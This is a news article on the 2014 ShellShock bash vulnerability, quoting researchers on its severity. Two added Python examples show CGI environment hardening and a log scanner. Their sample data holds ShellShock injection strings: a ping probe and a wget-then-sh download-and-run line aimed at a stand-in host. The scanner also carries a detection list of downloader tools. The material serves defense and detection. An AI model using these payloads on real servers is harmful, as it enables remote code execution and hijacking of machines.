Worse than Heartbleed. That's what security professionals are saying about the newly discovered “Bash Bug,” a vulnerability in the Unix Bourne Again Shell (BASH) that makes it possible for attackers to exploit Linux and Apple OS X systems.
While the CVE-2014-6271 bug, also referred to as ShellShock, is posited to have existed for many years, it was just discovered last week by Akamai security researcher Stephane Chazelas. And pronouncements that it is worse than Heartbleed, the critical vulnerability that was discovered in widely used versions of the OpenSSL library, stem from the prevalence of Bash shells in everything from servers to web-connected Internet of Everything (IoT) devices.
“It is the worst vulnerability we have seen so far this year,” Roel Schouwenberg, a senior researcher at Kaspersky Labs, told SCMagazine.com in a Thursday interview. Unlike Heartbleed, “which was really about attackers getting information from machines,” the Bash Bug “executes arbitrary commands from affected devices, mostly Web servers.”
Calling ShellShock “far more prevalent,” David Larson, CTO at Corero Network Security, pointed out to SCMagazine.com in a Thursday email correspondence that “the bug impacts Linux/Apache machines which makes up over 50 percent of the population [and]…impacts the last 25 years of BASH versions,” whereas Heartbleed was only dangerous to “a specific version of OpenSSL. This is big.”
Schouwenberg said that it is too early to gauge the extent of the damage that the Bash Bug can do. “We don't understand the scope of this vulnerability,” he said. But since security experts keep spinning a seemingly endless number of scenarios in which the vulnerability could be exploited, “that makes it very serious.”
Because bash is “a common shell for evaluating and executing commands from other programs,” Akamai CISO Andy Ellis said in a Thursday blog post that the “vulnerability may affect many applications that evaluate user input, and call other applications via a shell.” And ultimately, that allows “an adversary…[to] pass commands to bash to execute arbitrary code,” he wrote.
Jaime Blasco, director of AlienVault Labs, in a Thursday blog post, called the vulnerability “critical since it can be exposed on web servers that use mod_cgi or code that calls the bash shell.” He said that the other systems that might be affected include “network services and daemons that use shell scripts with environmental variables.”
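The exposure Ellis and Blasco describe comes from one concrete plumbing pattern: a CGI gateway copies every request header into the environment of a child process, and if that child is (or later spawns) a vulnerable bash, bash parses the header value. The following Python is an added illustration written for this article, not code from Akamai, AlienVault or any of the people quoted; the header names, the `cgi_environment` / `hardened_environment` helpers and the sample request are constructed. It shows the classic header-to-environment mapping beside a hardened version that starts from an empty environment, allowlists headers, rejects values shaped like bash function exports, and never hands request data to `bash -c`. Patching bash is the actual fix; this is the application-side reduction of what reaches any shell at all.

```python
import subprocess

# Constructed sample request headers, as a CGI gateway would receive them.
SAMPLE_HEADERS = {
    "Host": "www.example.com",
    "User-Agent": "Mozilla/5.0 (constructed sample)",
    # Hypothetical hostile header: the exported-function shape that vulnerable
    # bash versions parsed out of any environment variable.
    "Cookie": "() { :; }; echo attacker-controlled",
}


def cgi_name(header):
    """Map an HTTP header name to its CGI environment variable name."""
    return "HTTP_" + header.upper().replace("-", "_")


def cgi_environment(headers):
    """The pattern ShellShock abuses: every request header is exported unchanged
    into the child's environment before a shell (or a script run by one) starts."""
    return {cgi_name(h): v for h, v in headers.items()}


def looks_like_function_export(value):
    """True when a value begins with bash's exported-function marker."""
    return value.lstrip().startswith("() {")


def hardened_environment(headers, allowed=("Host", "User-Agent")):
    """Build the child's environment from scratch: a fixed PATH plus only the
    allowlisted headers, rejecting any value that looks like a function export."""
    env = {"PATH": "/usr/bin:/bin"}
    for h in allowed:
        if h not in headers:
            continue
        if looks_like_function_export(headers[h]):
            raise ValueError(f"rejected header {h!r}: looks like a bash function export")
        env[cgi_name(h)] = headers[h]
    return env


def run_helper(headers, argv=("/bin/true",)):
    """Hypothetical helper invocation: argv is a list and there is no 'bash -c'
    or shell=True, so request data is never handed to a shell parser by us.
    Returns the child's exit status."""
    return subprocess.run(list(argv), env=hardened_environment(headers), check=False).returncode


if __name__ == "__main__":
    print("classic CGI env :", cgi_environment(SAMPLE_HEADERS))
    print("hardened env    :", hardened_environment(SAMPLE_HEADERS))
```

The allowlist and the `() {` check only narrow the surface; any allowlisted value still reaches bash if the helper itself is a shell script or calls `system()`, which is why the bash update matters more than any wrapper-side filtering.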
AlienVault has been running a honeypot for the vulnerability since Wednesday, lying in wait for attackers to exploit it, and in less than 24 hours “have had several hits.” Most, he wrote, “are systems trying to detect if the system is vulnerable and they simply send a ping command back to the attacker's machine.”
In some of the attacks that security experts are seeing in the wild, exploiting ShellShock can be “as simple as telling the server, ‘Hey, download this file and run it,’ and an attacker has access to the box,” Ronnie Tokazowski, senior researcher at PhishMe, told SCMagazine.com in a Thursday email correspondence. “With very little effort, an attacker could set up DDoS attacks, create a botnet with affected devices, or crash all of these devices if they wanted to.”
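The honeypot hits Blasco describes and the “download this file and run it” pattern Tokazowski mentions both leave a recognisable trace in ordinary web server logs, because the payload rides in a request header. The scanner below is an added example for this article, not tooling from AlienVault, PhishMe or SC Magazine; the log lines are constructed (documentation address ranges, invented timestamps) and the `scan` / `classify` functions are assumptions of this example. It parses Apache combined-format lines, flags any field carrying bash's exported-function marker, recovers the trailing command, and labels it as a reconnaissance probe (ping, echo) or a download-and-run attempt (wget, curl), matching the two kinds of activity the article reports.

```python
import re

# Constructed sample Apache combined-format access log (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/ping -c 1 198.51.100.7"
203.0.113.6 - - [25/Sep/2014:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (constructed)"
203.0.113.7 - - [25/Sep/2014:10:03:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; /usr/bin/wget http://198.51.100.9/x -O /tmp/x; sh /tmp/x" "curl/7.30"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# The exported-function marker followed by whatever command trails the body.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")

PROBE_TOOLS = {"ping", "echo", "id", "uname", "sleep"}
DOWNLOADERS = {"wget", "curl", "fetch"}


def classify(cmd):
    """Label a recovered command by its first executable's basename."""
    first = cmd.strip().split()[0].rsplit("/", 1)[-1]
    if first in DOWNLOADERS:
        return "download-and-run"
    if first in PROBE_TOOLS:
        return "probe"
    return "other"


def scan(log_text):
    """Return one finding per log line whose request, referer or user-agent
    carries a ShellShock-shaped payload. Unparseable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "user_agent"):
            hit = SHELLSHOCK_RE.search(m.group(field))
            if hit:
                cmd = hit.group("cmd").strip()
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "field": field,
                    "command": cmd,
                    "kind": classify(cmd),
                })
    return findings


def sources(findings):
    """Distinct source addresses, in order of first appearance."""
    seen = []
    for f in findings:
        if f["ip"] not in seen:
            seen.append(f["ip"])
    return seen


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['field']:10} {f['kind']:17} {f['command']}")
```

The regex is deliberately loose about whitespace inside the function body, since variants of the marker were observed in the days after disclosure; a production rule would also inspect headers that never reach the access log (Cookie, Referer on some configurations), which is why web server or IDS inspection of the raw request is the better vantage point.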
It is that ease of exploitation, which Tokazowski rates at “11, possibly a 12,” that helps ShellShock edge ahead of Heartbleed in terms of potential impact.
With Heartbleed, an attacker “has to get lucky to find a username and password combination that works, then needs to find a VPN concentrator or some other login form, and hope that an enterprise isn't doing geolocation IP matching based off of usernames,” he said. “Once there, the attacker would then have to find a vulnerability on the system to break out of the app to get on the system, and then perform a privilege escalation attack in order to gain root level access.”